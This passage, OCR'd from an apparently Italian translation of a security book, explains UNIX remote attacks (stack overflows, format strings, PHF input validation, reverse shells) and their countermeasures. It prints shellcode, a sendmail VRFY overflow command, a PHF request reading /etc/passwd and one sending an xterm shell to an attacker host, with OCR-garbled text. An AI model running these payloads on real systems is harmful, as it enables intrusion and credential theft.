un articolo per la rivista che si occupa di sicurezza informatica Phrack Magazine 
(numero 49) intitolato “Smashing the Stack for Fun and Profit" (distruggere lo stack, 
per divertimento e per profitto). Questo articolo ha avuto una profonda influenza 
sulla presa di coscienza delle condizioni della sicurezza informatica. Ha messo a 
nudo con estrema chiarezza quanto l’effetto di pratiche di sviluppo poco intelligenti 
possa compromettere la sicurezza di un sistema, attraverso attacchi di tipo buffer 
overflow, Gli attacchi buffer overflow risalgono addirittura al lontano 1988, anno in 
cui si è verificato il grave incidente Worm che ha visto come protagonista Robert 
Morris. Fino al 1996, è stato comunque molto difficile reperire informazioni utili e 
particolareggiate in relazione a questo genere di attacchi. 

Possiamo riscontrare una condizione di buffer overflow quando un utente o un pro- 
cesso tenta di inserire all’interno di un buffer (array a dimensione fissa) una quantità 
di dati avente dimensione superiore a quella consentita. Questo tipo di comporta- 
mento è associato a specifiche funzioni del linguaggio C, come per esempio str- 
cpy(), strcat() e sprintf(), tanto per indicarne alcune. 

La condizione di buffer overflow dovrebbe normalmente causare un errore di tipo 
segmentation violation (violazione di segmentazione), che può essere sfruttato per 
riuscire a ottenere l’accesso al sistema target. In questo momento stiamo discutendo 
di errori di buffer overflow causati da attacchi remoti, ma le stesse condizioni pos- 
sono anche essere causate da applicazioni locali: prenderemo in esame questa eve- 
nienza in dettaglio nel prosieguo del capitolo. Per comprendere come viene provo- 
cato un errore di buffer overflow, illustriamo un esempio semplice ma efficace. 
Supponiamo di avere a disposizione un buffer a grandezza fissa di dimensione 
128 byte, utilizzato dal servizio sendmail per memorizzare l'input che viene forni- 
to dal comando VRFY. Ricordate il Capitolo 3, in cui abbiamo utilizzato il coman- 
do VRFY per poter identificare con maggior facilità gli utenti potenziali del siste- 
ma target del nostro attacco: nel caso specifico stavamo cercando di verificare 
l’esistenza degli indirizzi di posta elettronica degli utenti. Supponiamo che l’uten- 
te con il quale sendmail sta operando nel sistema sia il SUID root, e che possieda 
i diritti di root. Questo potrebbe comunque non essere vero per tutti i sistemi che 
cerchiamo di attaccare. Che cosa succede se un hacker si connette al daemon 
sendmail e invia una sequenza di 1000 “a” al comando VRFY, invece di utilizzare 
un nome utente più breve? 


Echo "vrfy 'perl -e 'print "a" x 1000''" nc www.example.com 25 


Il buffer VRFY viene esaurito, perché era progettato per contenere un massimo di 
128 caratteri. L'inserimento di 1000 byte nel buffer di VRFY potrebbe provocare un 
errore del tipo Denial of Service e bloccare il daemon sendmail, oppure (questa è 
una situazione ancora più pericolosa) il sistema potrebbe anche essere costretto a 
eseguire parti di codice scelte dall’hacker che ha provocato l’errore: questa è esatta- 
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mente la modalità di funzionamento di un attacco di tipo buffer overflow sferrato 
con successo. 

Invece di inviare al comando VRFY una serie di 1000 lettere “a”, l’hacker potrebbe 
inviare un codice specifico che provoca il buffer overflow ed esegue il comando 
/bin/sh. Ricordate, a questo punto, che il servizio sendmail è attivo nel sistema 
come utente root, per cui il comando /bin/sh può essere eseguito, e l’hacker po- 
trebbe avere accesso immediato come utente root. Potreste chiedervi in che modo 
sendmail sia in grado di determinare che deve essere eseguito il comando /bin/sh. 
Questo è molto semplice: quando ha inizio l'attacco, nella stringa inviata per creare 
l’errore di buffer overflow viene inclusa una specifica parte di codice assembly, det- 
ta “egg” (in inglese “uovo”). Quando il buffer VRFY va in errore, l’hacker può impo- 
stare il codice di ritorno della funzione appena trasmessa, in modo da alterare il 
normale flusso di esecuzione del programma originario. Invece di consentire al pro- 
gramma l'esecuzione della locazione di memoria appropriata verrà eseguito il codi- 
ce assembly inviato come riempitivo del buffer, corrispondente alle istruzioni di 
esecuzione del comando /bin/sh con i privilegi del daemon (cioè di root). Fine 
della partita. 

È molto importante ricordare che il codice assembly è fortemente dipendente dalla 
piattaforma hardware e dal sistema operativo: un buffer overflow studiato per Sola- 
ris X86 su piattaforma Intel è completamente differente da quello creato apposita- 
mente per Solaris, su piattaforma SPARC. Il listato che segue mostra una di queste 
“uova” scritta in codice assembly appositamente studiata per Linux su piattaforma 
X86: 


char shellcode[] = 
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x@c\xb@0\x0@b" 
"\xB9\xf3\x8d\x4e\x08\x8d\x56\x@c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" 
"\xB0\xe8\xdc\xff\xff\xff/bin/sh"; 


A questo punto dovrebbe essere evidente che gli attacchi prodotti con buffer over- 
flow sono molto pericolosi e spesso sfociano in una completa disfatta per la sicu- 
rezza di molti sistemi. Considerate che il nostro esempio è estremamente semplice: 
è veramente difficile riuscire a creare una stringa di buffer overflow perfettamente 
funzionante. 

Esistono comunque diverse “uova”, tutte dipendenti dal sistema per il quale sono 
state sviluppate, già sperimentate e liberamente disponibili via Internet. I processi 
che consentono di creare queste “sorpresine” non sono tuttavia tra le finalità di 
questo libro. Potete in ogni caso leggere l’articolo di Aleph One disponibile in in- 
glese su Pbrack Magazine (numero 49) all'indirizzo http://ww.codetalker 
.com/other/p49-14.html, 

In aggiunta, alla Teso hanno creato alcuni strumenti che generano automaticamente 
un codice di shell. Tra gli altri, segnaliamo Hellkit, disponibile all'indirizzo http: // 
teso.scene.at/releases.hellkit-1.2.tar.gz. 


Contromisure ai buffer overflow 
Pratiche di programmazione sicura 


La migliore contromisura per contrastare gli attacchi da buffer overflow consiste 
nell’adottare metodologie sicure di sviluppo del software. Sappiamo bene che è 
impossibile progettare e scrivere applicazioni completamente prive di errori, ma 
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è possibile seguire una serie di regole che riducono al minimo i rischi connessi 
ai buffer overflow. Il brevissimo prontuario che segue può essere preso come ri- 
ferimento. 


e  Progettate le vostre applicazioni tenendo sempre in grande considerazione i 
requisiti di sicurezza. Molto spesso, per rispettare i tempi di consegna sem- 
pre più ristretti, i programmi vengono scritti in modo affrettato. La sicurezza 
è sempre l’ultimo aspetto che viene preso in considerazione e molto spesso 
viene addirittura accantonata. I produttori di software hanno quasi trascura- 
to parte del codice che è stato rilasciato di recente; molti di questi sono con- 
sapevoli del fatto che questa trascuratezza nella gestione dello sviluppo sia 
presente e diffusa, ma spesso non si occupano di investire tempo e risorse 
per far fronte alle esigenze di sicurezza. Per maggiori informazioni potete 
consultare la FAQ del Secure UNIX Program (programma per la sicurezza in 
ambiente UNIX) al sito http://ww.whitefang.com/sup/index.html. 


e Prendete in considerazione la possibilità di utilizzare compilatori che offro- 
no garanzie di sicurezza del codice generato, come per esempio Stack- 
Guard prodotto da Immunix (http://immunix.org). L'approccio di questo 
genere di compilatori consiste nel generare applicazioni che siano “immu- 
nizzate”, per poter gestire con maggiore sicurezza l'impatto provocato dai 
buffer overflow. Altri meccanismi di difesa includono Libsafe (http: // 
www.avayalabs.com/project/libsafe/index/html), il cui obiettivo è in- 
tercettare le chiamate di sistema vulnerabili. Per la descrizione completa 
delle funzionalità di Libsafe e dei dettagli di funzionamento di un buffer 
overflow, consultate il documento all'indirizzo http://the.wire-tapped 
.net/security/host-security/libasafe/paper.html#sec:ex-ploit. 
Ricordate che questi meccanismi non possono essere considerati una solu- 
zione miracolosa ed è importante non lasciarsi cullare da un falso senso di 
sicurezza. 

e Ogni volta che viene elaborato un parametro ricevuto da un utente o da 
un’altra applicazione, questo dovrebbe essere sempre validato. Alcuni pro- 
grammi potrebbero risultare rallentati da questo eccesso di controlli, ma la 
sicurezza complessiva di ogni applicazione tende ad aumentare molto. 1 
controlli devono includere la verifica della capienza di ciascuna variabile, 
prestando particolare attenzione alle variabili di ambiente. 

e Utilizzate le funzioni più sicure del linguaggio C, come per esempio 
fget(), strncpy() e strncat(), verificando i codici restituiti dopo cia- 
scuna chiamata. 

e  Riducete la quantità di codice eseguito con i privilegi dell’utente root, in 
modo da ridurre al minimo il numero di applicazioni che nel sistema sono 
attive come SUID root: se venisse portato a termine un attacco tramite buf- 
fer overflow, all'eventuale hacker sarebbe quantomeno necessario effettua- 
re anche la scalata ai privilegi di root. 

e Più importante di tutto, applicate tutte le patch di sicurezza disponibili per i 
programmi che utilizzate. 


Test e monitoraggio di ciascun programma 


È molto importante eseguire il test e il monitoraggio di funzionamento di ciascun 
programma. Molto spesso i programmatori non sono a conoscenza dei pericoli de- 
rivanti dalla condizione di buffer overflow; una terza parte è sicuramente in grado 
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di individuare i difetti del software con maggiore facilità. Uno dei migliori esempi di 
organizzazione che esegue test completi su codice UNIX è il progetto OpenBSD 
(ww.openbsd.org), gestito da Theo de Raadt. La palestra OpenBSD continua ad 
analizzare il proprio codice sorgente e ha risolto migliaia di condizioni di buffer 
overflow, senza menzionare la risoluzione di moltissimi altri problemi relativi alla 
sicurezza del sistema. Grazie a questo continuo e metodico lavoro di revisione del 
proprio codice, OpenBSD si è creato la fama di essere il più sicuro tra i sistemi 
UNIX disponibili gratuitamente. 


Disattivazione dei servizi inutilizzati o pericolosi 


Continueremo a sottolineare questo aspetto durante tutto il capitolo. Vi invitiamo a 
disabilitare tutti i servizi che sono inutilmente attivi oppure che hanno caratteristi- 
che di accentuata pericolosità per il sistema UNIX. Un intruso non può fare breccia 
nel sistema utilizzando un servizio non attivo. In aggiunta a questo, raccomandiamo 
l'utilizzo di TCP Wrappers (tcpd) e di xinetd (http://www.synack.net/ xinetd/) 
per applicare una lista di accessi controllati sistematicamente a ogni servizio, con- 
sentendo anche l’uso di funzioni avanzate di autenticazione. Sebbene non sia possi- 
bile includere qualunque servizio in queste funzionalità di “contenimento”, tuttavia 
questi programmi di utilità sono in grado di fornire un sensibile miglioramento alla 
sicurezza globale del sistema. In aggiunta a questo, potete considerare la possibilità 
di utilizzare funzionalità integrate nel kernel che consentono di effettuare un filtro a 
livello di pacchetti di dati: queste funzioni sono disponibili nella maggior parte del- 
le versioni UNIX gratuite (per esempio, ipchains o netfilter per Linux e ipf per 
BSD). Un documento interessante sull’utilizzo di ipchains per migliorare la sicu- 
rezza del sistema è disponibile all’indirizzo http://www.tldp.org/HOWTO 
/IPCHAINS-HOWTO.html. Per i kernel Linux 2.4 che si servono di netfilter, fate ri- 
ferimento all'indirizzo http://netfilter.org/unreliable-guides/netfilter- 
hacking-HOWTO/. Il programma ipf scritto da Darren Reed è una delle migliori fun- 
zioni aggiuntive, e può essere utilizzato con diverse distribuzioni UNIX (tranne Li- 
nux). Per maggiori informazioni, vi rimandiamo a http://ww.obfuscation.org 
lipf/ipf-howto.html. 


Disabilitare l'esecuzione dello stack 


Alcuni puristi potrebbero rimanere attoniti di fronte a questa soluzione, che consiste 
nella disabilitazione completa dello stack, per avere la certezza completa che nessun 
programma abbia alcuna possibilità di andare incontro a errori di buffer overflow. 
Questa impostazione presenta alcuni effetti collaterali, ma è in grado di proteggere 
con efficacia i sistemi. Per Linux esistono patch che consentono la disabilitazione 
dell'esecuzione dello stack, disponibili per le versioni 2.0.x e 2.2.x del kernel (e in 
progetto anche per la versione 2.4) all'indirizzo http://www.openwall.com/linux/ 
ed è principalmente il lavoro di Solar Designer. Inoltre, potete utilizzare la versione 
per Linux di Openwall, reperibile al sito Web http://ww.openwall.com/0wl/e 
progettata per garantire la sicurezza fin dai livelli più bassi, mediante l'integrazione 
tra i molti canoni di sicurezza che Solar Designer ha fatto propri e un'accurata revi- 
sione del codice sorgente da parte dell'azienda produttrice. 

Per quanto riguarda i sistemi Solaris 2.6, 7 e 8, consigliamo vivamente di abilitare le 
condizioni di esecuzione senza stack: questo consente di disabilitare, una volta per 
tutte, una serie di buffer overflow conosciuti relativi a Solaris. Anche se l'interfaccia 
binaria applicativa (ABI) dei processori SPARC e Intel richiede che sia obbligatoria 
l'autorizzazione di esecuzione dello stack, la maggior parte dei programmi potrà 
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funzionare correttamente anche disabilitandolo. Dobbiamo notare che l’installazio- 
ne predefinita di Solaris 2.6, 7 e 8 abilita l'esecuzione dello stack. Per disabilitare 
questa funzione, è necessario aggiungere la seguente riga al file /etc/system: 


set noexec_user_stack=1 
set noexec_user_stack_log =1 


Ricordate che la disabilitazione dell'esecuzione dello stack non è una panacea per 
tutti i mali, anche se comporterà la registrazione nel file di log di qualunque pro- 
gramma che tenti di eseguirlo, e taglierà la maggior parte degli hacker dilettanti. Un 
hacker esperto può essere in grado di progettare e realizzare attacchi che sfruttano 
una condizione di buffer overflow, anche in un sistema in cui l'esecuzione dello 
stack è disabilitata. 

Mentre gli utenti sono costretti a operare in maniera inusitata per prevenire buffer 
overflow sugli stack, altri pericoli possono annidarsi nel codice di scarsa qualità. 
Anche se non attirano molto l’attenzione, gli overflow sull'heap sono altrettanto pe- 
ricolosi, e consistono nell’esaurimento della memoria allocata dinamicamente da 
un’applicazione. Questa tecnica di overflow differisce da quella utilizzata per lo 
stack, che è un butfer di lunghezza fissa. Sfortunatamente, i produttori non dispon- 
gono di patch che consentano la disabilitazione dell'esecuzione dell’heap. Pertanto, 
è importante non lasciarsi cullare da un falso senso di sicurezza solo perché è stata 
disabilitata l'esecuzione dello stack. Per ottenere maggiori informazioni sugli over- 
flow dell’heap, fate riferimento alle ricerche eseguite dal gruppo w00w00, disponi- 
bili all'indirizzo http://ww.w00w90.org/files/heaptut/heaptut.txt. 

Oltre alle contromisure sopraelencate, esistono i pacchetti di prevenzione contro le 
intrusioni, come Saint Jude, che possono essere utilizzati per bloccare gli attacchi: 
quest’ultimo (http://prdownloads.sourceforge.net/stjude/) è un modulo Li- 
nux per le serie di kernel 2.2.0 e 2.4.0, che implementa il modello Saint Jude per le 
cosiddette transazioni a privilegio improprio (http://sourceforge.net/stju- 
de/StJudeModel.pdf). Questo paradigma di sicurezza consente di scoprire gli at- 
tacchi locali e remoti al loro verificarsi (per esempio, le condizioni di buffer over- 
flow). Dopo averli individuati, Saint Jude termina la loro esecuzione, impedendo in 
tal modo che l’attacco possa interessare l'utente root. Questo comportamento ha 
luogo pur senza causare effetti simili a quelli degli attacchi già noti, consentendo a 
questa tecnica di essere valida anche per quelli non conosciuti. 


® Attacchi al formato delle stringa 


Diffusione: 8 
Semplicità: 8 
Impatto: 10 
Fattore di rischio: Di 


Ogni tanto si presenta sulla scena della sicurezza un nuovo tipo di vulnerabilità: 
quelle che interessano il formato della stringa sono sempre state insite nel codice 
software per anni, ma la loro pericolosità non si è resa evidente prima della metà 
del 2000. Come già accennato, la tecnica del buffer overflow è stata documentata 
nel 1996: quella del formato stringa e il buffer overflow sono tecniche assai simili 
dal punto di vista del funzionamento, ed entrambe hanno origine da comportamen- 
ti di programmazione poco attenti. 
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Una vulnerabilità di formato stringa nasce da errori di programmazione poco evi- 
denti nell'impiego della categoria di funzioni di formattazione, come print(f) e 
sprintf(). Un potenziale intruso potrebbe trarne vantaggio passando stringhe di 
testo accuratamente preparate, contenenti direttive di formattazione che, a loro vol- 
ta, potrebbero far eseguire comandi di qualsiasi tipo al computer cui l'attacco è de- 
stinato. Ciò può implicare seri rischi di sicurezza, quando l’applicazione soggetta 
all'attacco è eseguita con i privilegi di root. Ovviamente, la gran parte dei potenziali 
hacker concentra gli sforzi nello sfruttamento delle vulnerabilità di formato stringa 
su programmi che richiedono il SUID root. 

Le stringhe formattate sono estremamente utili, se utilizzate in modo opportuno: esse 
consentono di gestire l'output sulla base di un numero di argomenti dinamico, ognu- 
no dei quali dovrebbe rispondere a una direttiva di formattazione della stringa. Que- 
sta operazione è svolta dalla funzione printf(), che esamina la stringa di formatta- 
zione alla ricerca dei caratteri "%": quando ne trova uno, procede al recupero dell’ar- 
gomento corrispondente tramite la libreria di funzioni stdarg. I caratteri che seguono 
sono considerati come direttive, che controllano che la variabile sia formattata come 
stringa di testo. Un esempio di questo meccanismo è la direttiva %i che formatta una 
variabile di tipo intero in un valore decimale leggibile: nel caso in esame, prin- 
tf("$i", val), visualizzerebbe la rappresentazione decimale di val. I problemi di 
sicurezza sorgono quando il numero delle direttive non corrisponde a quello degli ar- 
gomenti: è essenziale notare che ogni argomento fornito per la formattazione viene 
conservato nello stack: se esistono più direttive rispetto agli argomenti forniti, tutti i 
dati successivi presenti nello stack saranno usati come argomenti. Per questo motivo, 
una discordanza delle direttive e degli argomenti genera un output errato. 

Un altro problema si verifica quando un programmatore pigro si serve di una strin- 
ga fornita dall’utente per utilizzarla come stringa di formattazione, invece di ricorre- 
re a funzioni di output di stringa più idonee. Un esempio di questa pratica di cattiva 
programmazione è la stampa o la visualizzazione della stringa contenuta nella varia- 
bile bf. Per esempio, per visualizzarla sullo schermo si potrebbe utilizzare sempli- 
cemente puts(buf), oppure printf("%s", buf). Un problema si verifica quando 
il programmatore non si attiene alle linee guida per le funzioni di output formattato. 
Malgrado gli argomenti successivi siano opzionali in printf(), il primo argomento 
deve essere sempre la stringa di formattazione: se invece di questa stringa è fornito 
un argomento passato dall’utente, come nel caso di printf(buf), ciò potrebbe im- 
plicare seri rischi di sicurezza. Un utente potrebbe passare opportune direttive di 
formato, come %x, per visualizzare tutte le WORD presenti nello stack, e di fatto leg- 
gere i dati conservati in memoria. 

La lettura dello spazio di elaborazione della memoria può già rappresentare un pro- 
blema a sé stante: tuttavia è assai più devastante il caso dell’hacker che abbia la 
possibilità di scrivere in memoria. Fortunatamente per l’intrusore stesso, la funzione 
printf() ha la possibilità di scrivere direttamente in memoria. printf() non for- 
matta né visualizza l'argomento corrispondente, ma interpreta l'argomento come in- 
dirizzo di memoria (posizione) di un intero, e conserva il numero di caratteri scritti 
fino a quella posizione. Un'altra possibilità offerta, per quanto riguarda il formato 
stringa, è posizionare i dati nello stack che dovrà essere elaborato dalle direttive di 
formato stringa dell’hacker stesso. 

Questo risultato può essere raggiunto facilmente grazie a printf e al modo in cui la 
funzione gestisce la stessa elaborazione del formato stringa. I dati sono opportuna- 
mente posizionati nello stack, prima di essere elaborati: qualora fossero fornite suf- 
ficienti direttive aggiuntive nella stringa di formattazione, la stessa stringa sarebbe 
utilizzata come argomento per le sue stesse direttive. 
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Ecco un esempio di programma di attacco: 


#include <stdio.h> 
#include <string.h> 
int main(int argc, char **argv) { 
char buf[2048]) = { 0 }; 
strncpy(buf, argv[1], sizeof(buf) - 1); 
printf(buf); 
putchar('\n'); 
return(0); 


} 


Ed ecco lo stesso programma in azione: 


[shadow $] ./code DDDD%x%x 
DDDDbffffaa44444444 


Si può notare che le x hanno formattato gli argomenti a dimensione intera nello 
stack, e che li hanno visualizzati in formato esadecimale; ma l'aspetto veramente in- 
teressante è l'output del secondo argomento, 44444444, che è rappresentato in me- 
moria come stringa DDDD, ossia la prima parte della stringa di formattazione fornita. 
Se si dovesse modificare la seconda %x in %n, potrebbe verificarsi un errore di seg- 
mentazione, dovuto al fatto che l'applicazione cerca di scrivere all’indirizzo 
0x44444444, anche se questo non è effettivamente scrivibile. Si verifica assai di fre- 
quente che un intruso scriva l'indirizzo di ritorno sullo stack: la sovrascrittura pro- 
voca il ritorno, da parte della funzione, di un segmento di codice dannoso, che 
l'hacker ha fornito con la stringa di formattazione. Come si può vedere, la situazio- 
ne sta degenerando precipitosamente, ed è questo che rende gli attacchi al formato 
stringa così pericolosi. 


O Contromisure all’attacco al formato delle stringhe 


Molti attacchi al formato stringa sfruttano il medesimo principio di quelli di tipo buf- 
fer overflow, che si riferiscono alla sovrascrittura del valore di ritorno restituito da 
una chiamata di funzione: molte delle contromisure valide per questi ultimi si pos- 
sono applicare anche agli attacchi di formato stringa. 

Inoltre, inizieremo a vedere altre misure che contribuiscono a proteggere contro gli 
attacchi al formato stringa. FormatGuard per Linux è implementato come integra- 
zione di glibc, e fornisce una libreria di macro di printf in stdio.h, nonché alcune 
funzioni native come parte di glibc: è distribuito sotto licenza LGPL di glibc e può 
essere scaricato all'indirizzo http://download.immunix.org/immunix0S/. 


C) Attacchi di validazione dell’input 


Diffusione: 8 
Semplicità: 9 
Impatto: 8 
Fattore di rischio: 8 


Nel 1996 Jennifer Myers ha identificato e reso di pubblico dominio il famigerato 
punto vulnerabile PHF. Sebbene sia abbastanza datato, è un valido esempio di at- 
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tacco di validazione dell’input. Se siete in grado di comprendere il meccanismo di 

funzionamento di questo attacco, potrete applicare lo stesso principio ad altri attac- 

chi della stessa categoria. Non ci fermeremo troppo a lungo su questo aspetto, poi- 

ché ne parleremo con maggior dettaglio nel Capitolo 15. Ci proponiamo di mostrare 

che cosa sia un attacco di validazione dell'input, e in quale modo un hacker possa 

riuscire a ottenere l'accesso a un sistema UNIX. 

L'attacco alla validazione dell'input avviene nei seguenti casi. 

e Un programma non riesce a riconoscere un input sintatticamente non cor- 
retto. 


Un modulo accetta input impropri. 
Un modulo fallisce nel momento in cui cerca di elaborare un input mancan- 
te. 


e Viene generato un errore di correlazione relativo a un campo di input. 


PHF è uno script CGI (Common Gateway Interface) che era presente nelle prime 
versioni del Web server Apache, e in NCSA HTTPD. Questo programma non inter- 
pretava nella maniera corretta l'input che riceveva: la versione originale dello script 
PHF accettava il carattere newline (*%9a) ed eseguiva qualunque comando successi- 
vo, con le autorizzazioni dell'utente che stava eseguendo il servizio di server Web. 
L’attacco originale per PHF era semplicemente questo: 


/egi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd 


Come potete vedere, l’unica operazione eseguita da questo attacco è il comando 
cat per visualizzare il file delle password /etc/passwd. Ovviamente questa infor- 
mazione può essere utilizzata per risalire ai nomi utente e alle password cifrate, 
supponendo che il file delle password non sia cifrato. Nella maggior parte dei casi, 
qualunque hacker alle prime armi tenterà di utilizzare queste informazioni per av- 
viare il crack del file delle password e per collegarsi successivamente al sistema. Un 
hacker più esperto potrebbe addirittura ottenere l’accesso diretto a una shell di si- 
stema, come vi spiegheremo nel prosieguo di questo capitolo. Ricordate che questo 
difetto di PHF consentiva all’intruso di eseguire qualunque comando, usufruendo 
delle autorizzazioni dell’utente attribuito al servizio server Web. In molti casi tale 
utente è “nobody”, ma esistono diversi siti che erano configurati per avviare il servi- 
zio Web server addirittura come root: un peccato mortale. 

PHF è diventato un metodo di attacco ai sistemi molto famoso tra gli anni 1996 e 
1997, e molti siti hanno pagato le conseguenze di questa esposizione a un attacco 
semplice ma efficace. Vogliamo farvi comprendere come sia stato possibile scoprire 
questo punto vulnerabile, per poter applicare in seguito questo stesso concetto ad 
altri attacchi alla validazione dell'input. In ambiente UNIX, esistono metacaratteri 
che sono utilizzati per scopi particolari. Ne fanno parte i simboli seguenti: 


\/<>ISWA&*|1)]*%=; 


Se un programma o uno script CGI accetta l'input specificato dall'utente, senza 
effettuare una corretta validazione del dato, il programma o lo script possono 
essere ingannati, consentendo quindi l'esecuzione di codice arbitrario. Questo 
genere di comportamento è chiamato anche “sfuggire” al controllo di un pro- 
gramma, e di solito comporta il passaggio di qualche metacarattere UNIX come 
stringa in input al programma. Questo tipo di attacco è molto comune, e sicura- 
mente non è limitato allo script PHF. Esistono moltissimi esempi di script CGI 
non sicuri, tutti forniti con l'installazione predefinita di molti Web server. La si- 
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tuazione è peggiorata dal fatto che queste applicazioni sono sviluppate da pro- 
grammatori Web che di solito hanno poca esperienza nello sviluppo di applica- 
zioni sicure. Sfortunatamente questo genere di attacchi è destinato a proliferare, 
dal momento che le applicazioni Web per il commercio elettronico sono sempre 
più complesse e ricche di funzionalità. 


© Contromisure per la validazione dell’input 


Come abbiamo già accennato, l’unica misura di sicurezza valida è basata sulle buo- 
ne metodologie di programmazione e questa regola vale anche per gli attacchi di 
validazione dell’input. È assolutamente importante assicurarsi che i programmi e gli 
script accettino solo i parametri per i quali sono stati costruiti e che rifiutino qualun- 
que altra cosa venga loro passata. WWW Security FAQ (disponibile all'indirizzo ht - 
tp://ww.w3.org/Security/Fag/ww-security-faq.zip) è una notevole fonte di 
informazioni che può essere utilizzata per mantenere i programmi CGI sicuri. Sap- 
piamo che è difficile scartare qualunque dato, perché prima o poi potreste perdervi 
qualche parametro utile. Potete inoltre monitorare e testare tutto il codice dopo la 
sua compilazione. 


Voglio la mia shell 


Ora che abbiamo illustrato i due principali metodi che consentono l’accesso remoto 
a un sistema UNIX, è necessario spiegare le diverse tecniche che vengono utilizzate 
per ottenere l’accesso alla shell. Dovete ricordare che il primo obiettivo di ogni hac- 
ker consiste nell’ottenere l’accesso a una riga di comando, o a una shell, del sistema 
che si vuole attaccare. Il metodo tradizionale per ottenere l’accesso a una shell di un 
server UNIX consiste nell’effettuare il login attraverso una sessione telnet, rlogin 
oppure ssh: è anche possibile eseguire comandi con rsh, ssh oppure rexec, senza 
eseguire una procedura di autenticazione interattiva. Potreste chiedervi, a questo 
punto, che cosa succede se i servizi di login remoto vengono disattivati oppure 
sono bloccati da un firewall. Come è possibile per un hacker ottenere l’accesso a un 
sistema protetto in questo modo? Buona domanda. Cerchiamo di ipotizzare una si- 
tuazione ed esploriamo i diversi metodi che possono essere messi in pratica per 
raggiungere la shell del sistema UNIX. La Figura 7.1 li illustra. 

Supponiamo che il nostro hacker stia cercando di introdursi in un server Web di 
tipo UNIX che risiede all’interno di una rete protetta da un firewall o da un rou- 
ter standard, che analizza i pacchetti che circolano sulla rete. In questo momen- 
to, non è importante specificare marca e modello di hardware o software, ma 
comprendere che il funzionamento del firewall è basato sull’instradamento dei 
pacchetti circolanti, e non svolge la funzione di proxy per alcun servizio: gli 
unici che possono liberamente circolare attraverso il router (o firewall) sono 
HTTP, sulla porta 80, e HTTP su SSL (HTTPS), sulla porta 443. Supponiamo ora 
che il server Web attivo sia vulnerabile a un attacco alla validazione dell'input, 
come abbiamo visto nel caso di PHF, menzionato in precedenza. Il server Web è 
attivo nel sistema con i privilegi dell'utente “nobody”, pratica diffusa che è con- 
siderata una garanzia di sicurezza. Se l’hacker riesce a sfruttare il punto vulnera- 
bile PHF sarà in grado di eseguire programmi e comandi sul server, qualifican- 
dosi come utente “nobody”. La possibilità di eseguire il codice sul server è già 
una condizione critica, ma rappresenta solamente il primo passo per poter otte- 
nere l’accesso interattivo a una shell di sistema. 
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Figura 7.1 
Una semplice architettura segmentata, 


® Operation X 


Diffusione: 7 
Semplicità: 3 
Impatto: 8 
Fattore di rischio: 6 


Dal momento che l’intruso è in grado di eseguire programmi e comandi sul server 
Web, attraverso l'attacco a PHF, una delle prime tecniche per ottenere l’accesso inte- 
rattivo consiste nello sfruttamento delle funzionalità del sistema X Window di UNIX. 
X è il sistema di interfaccia grafica che consente a diversi programmi di condividere 
l'interfaccia grafica, permettendo ai programmi client X di visualizzare il loro output 
direttamente sulla console del server X, oppure di trasmetterlo a un server remoto, at- 
tivo sulle porte 6000-6063. Uno dei più proficui client X che gli hacker sfruttano è 
xterm, che viene utilizzato per avviare una shell locale di comando attraverso il server 
grafico X. Attivando l'opzione -display l’hacker è in grado di dirottare la shell di co- 
mando verso il server X del sistema remoto ottenendo l’accesso immediato. 

Diamo una breve occhiata al metodo che può essere utilizzato da un hacker per 
sfruttare il difetto di PHF e ottenere qualcosa di più di una semplice visualizzazione 
del file passwd. Richiamiamo l'attacco PHF originale: 


/egi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd 
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Dal momento che l’intruso è in grado di eseguire comandi remoti sul server Web, 
una versione lievemente modificata di questo attacco può consentire l’accesso alla 
shell. L'unica modifica necessaria è il comando eseguito, che passa da /bin/cat 
fetc/passwd al comando /usr/X11R6/bin/xterm -ut -display evil hackers 
IP:0.0, come mostrato di seguito: 


/cegi-bin/phf?Qalias=x%0a/usr/X11R6/bin/xterm®%20 -ut920 - 
display%20evil hackers_IP:0,0 


Il server Web remoto esegue una sessione xterm e la trasmette per la visualizzazio- 
ne al server X della macchina evil_hackers in corrispondenza dell’ID window 0 e 
dell’ID screen 0. L'hacker ha ora il controllo completo del sistema. Dal momento 
che viene specificata l'opzione -ut, questa attività non è registrata nel log di sistema 
del server Web. In aggiunta, viene utilizzato il carattere %20, che è l'equivalente esa- 
decimale del carattere spazio, utilizzato per definire gli spazi necessari nelle righe di 
comando (per ulteriori informazioni, digitate man ascii). In questo modo l’hacker 
è in grado di ottenere l’accesso a una shell interattiva, senza registrare l'operazione 
in alcun log di servizio del server Web. Noterete che è anche stato utilizzato il per- 
corso completo del programma eseguibile xterm. Questo dev'essere specificato 
perché è probabile che la variabile di ambiente PATH non sia impostata corretta- 
mente quando viene eseguito il comando. L’hacker si assicura, in questo modo, di 
poter rintracciare in ogni caso l'eseguibile xterm sul server Web. 


9 Telnet inverso e canali di ritorno 
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Certamente xterm è un buon punto di partenza per ogni hacker, ma cosa succede se i 
superprotettivi amministratori di sistema rimuovono il server X dall’installazione di 
UNIX? Questa operazione può migliorare notevolmente le caratteristiche di sicurezza 
del sistema UNIX. Esistono però altri metodi che consentono di ottenere l'accesso al 
server oggetto dell'attacco: uno di questi consiste nella creazione di un canale di ritorno 
(back channel), che è un meccanismo tramite il quale il canale di comunicazione viene 
richiesto e creato dal sistema target e 077 dal sistema attaccante. Ricordate che nella si- 
tuazione ipotizzata non è possibile ottenere l’accesso a una shell interattiva in senso tra- 
dizionale, perché tutte le porte di comunicazione (a parte 80 e 443) sono bloccate dal 
firewall. In questa situazione, l’hacker deve tentare di avviare una sessione dal server 
UNIX verso il proprio sistema, cercando appunto di costruire un canale di ritorno. 

Per svolgere questa operazione possono essere utilizzati alcuni metodi. Il primo 
consiste nell’avviare una sessione di telnet inverso, utilizzando il comando telnet 
sul server Web, per costruire un canale di ritorno dal sistema UNIX attaccato alla 
macchina dell'hacker. Questa tecnica è chiamata “telnet inverso”, proprio perché la 
connessione telnet viene generata dal sistema sul quale si sta cercando di stabilire 
un accesso alla shell. 

Nella maggior parte dei sistemi UNIX è installata un'applicazione client telnet, 
molte volte non disattivata: telnet rappresenta la scelta perfetta per costruire un 
canale di ritorno, se il client xterm non è disponibile. Per eseguire una sessione di 
telnet inverso, l’hacker ha la necessità di attivare i programmi di utilità netcat, op- 
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pure nc sulla propria postazione. Dal momento che la sessione di telnet viene av- 
viata dal sistema target, è necessario attivare nc, per essere in grado di accettare la 
richiesta di connessione proveniente dal server Web. A tale scopo dobbiamo ese- 
